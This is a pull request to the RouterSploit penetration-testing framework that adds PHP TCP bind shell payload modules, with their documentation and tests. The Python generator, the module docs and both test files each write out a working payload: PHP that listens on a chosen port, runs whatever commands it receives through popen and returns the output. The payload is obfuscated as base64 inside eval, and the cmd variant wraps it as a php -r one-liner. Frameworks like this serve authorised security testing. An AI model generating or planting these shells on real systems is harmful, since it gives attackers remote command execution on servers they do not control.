### PR TITLE
Adding PHP Bind TCP payloads

### DIFF
--- a/docs/modules/payloads/cmd/php_bind_tcp.md
+++ b/docs/modules/payloads/cmd/php_bind_tcp.md
@@ -1,0 +1,23 @@
+## Description
+
+Module generates payload that creates interactive tcp bind shell by using php one-liner. 
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/cmd/php_bind_tcp`
+  3. Do: `set rport 4321`
+  4. Do: `run`
+  5. Module generates php tcp bind shell payload
+
+## Scenarios
+
+```
+rsf > use payloads/cmd/php_bind_tcp
+rsf (PHP Bind TCP One-Liner) > set rport 4321
+[+] rport => 4321
+rsf (PHP Bind TCP One-Liner) > run
+[*] Running module...
+[*] Generating payload
+php -r "eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));"
+```

--- a/docs/modules/payloads/php/bind_tcp.md
+++ b/docs/modules/payloads/php/bind_tcp.md
@@ -1,0 +1,23 @@
+## Description
+
+Module generates payload that creates interactive tcp bind shell by using php. 
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/php/bind_tcp`
+  3. Do: `set rport 4321`
+  4. Do: `run`
+  5. Module generates php tcp bind shell payload
+
+## Scenarios
+
+```
+rsf > use payloads/php/bind_tcp
+rsf (PHP Bind TCP) > set rport 4321
+[+] rport => 4321
+rsf (PHP Bind TCP) > run
+[*] Running module...
+[*] Generating payload
+eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));
+```

--- a/routersploit/modules/payloads/cmd/php_bind_tcp.py
+++ b/routersploit/modules/payloads/cmd/php_bind_tcp.py
@@ -1,0 +1,20 @@
+from routersploit.core.exploit import *
+from routersploit.modules.payloads.php.bind_tcp import Exploit as PHPBindTCP
+
+
+class Exploit(PHPBindTCP):
+    __info__ = {
+        "name": "PHP Bind TCP One-Liner",
+        "description": "Creates interactive tcp bind shell by using php one-liner.",
+        "authors": (
+            "Marcin Bury <marcin[at]threat9.com>"  # routersploit module
+        ),
+    }
+
+    cmd = OptString("php", "PHP binary")
+
+    def generate(self):
+        payload = super(Exploit, self).generate()
+
+        cmd = '{} -r "{}"'.format(self.cmd, payload)
+        return cmd

--- a/routersploit/modules/payloads/php/bind_tcp.py
+++ b/routersploit/modules/payloads/php/bind_tcp.py
@@ -1,0 +1,32 @@
+from base64 import b64encode
+from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
+
+
+class Exploit(BindTCPPayloadMixin, GenericPayload):
+    __info__ = {
+        "name": "PHP Bind TCP",
+        "description": "Creates interactive tcp bind shell by using php.",
+        "authors": (
+            "Andre Marques (zc00l)",  # shellpop
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        ),
+    }
+
+    def generate(self):
+        payload = (
+            "$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
+            "socket_bind($s,\"0.0.0.0\",{});".format(self.rport) +
+            "socket_listen($s,1);" +
+            "$cl=socket_accept($s);" +
+            "while(1){" +
+            "if(!socket_write($cl,\"$ \",2))exit;" +
+            "$in=socket_read($cl,100);" +
+            "$cmd=popen(\"$in\",\"r\");" +
+            "while(!feof($cmd)){" +
+            "$m=fgetc($cmd);" +
+            "socket_write($cl,$m,strlen($m));" +
+            "}}"
+        )
+
+        encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
+        return "eval(base64_decode('{}'));".format(encoded_payload)

--- a/tests/payloads/cmd/test_php_bind_tcp.py
+++ b/tests/payloads/cmd/test_php_bind_tcp.py
@@ -1,0 +1,16 @@
+from routersploit.modules.payloads.cmd.php_bind_tcp import Exploit
+
+
+# php bind tcp payload with rport=4321
+bind_tcp = (
+    "php -r \"eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));\""
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.rport = 4321
+
+    assert payload.generate() == bind_tcp

--- a/tests/payloads/php/test_bind_tcp.py
+++ b/tests/payloads/php/test_bind_tcp.py
@@ -1,0 +1,16 @@
+from routersploit.modules.payloads.php.bind_tcp import Exploit
+
+
+# php bind tcp payload with rport=4321
+bind_tcp = (
+    "eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));"
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.rport = 4321
+
+    assert payload.generate() == bind_tcp


### PR DESCRIPTION
## Status
**READY**

## Description
This PR adds PHP TCP bind shell payload and PHP TCP bind shell one-liner

## Verification
PHP TCP Bind Shell:
  1. Start `./rsf.py`
  2. Do: `use payloads/php/bind_tcp`
  3. Do: `set rport 4321`
  4. Do: `run`
  5. Module generates php tcp bind shell payload

PHP TCP Bind Shell One-Liner:
  1. Start `./rsf.py`
  2. Do: `use payloads/cmd/php_bind_tcp`
  4. Do: `set rport 4321`
  5. Do: `run`
  6. Module generates php tcp bind shell payload

## Checklist
- [x] Write module/feature 
- [x] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py))
- [x] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md))
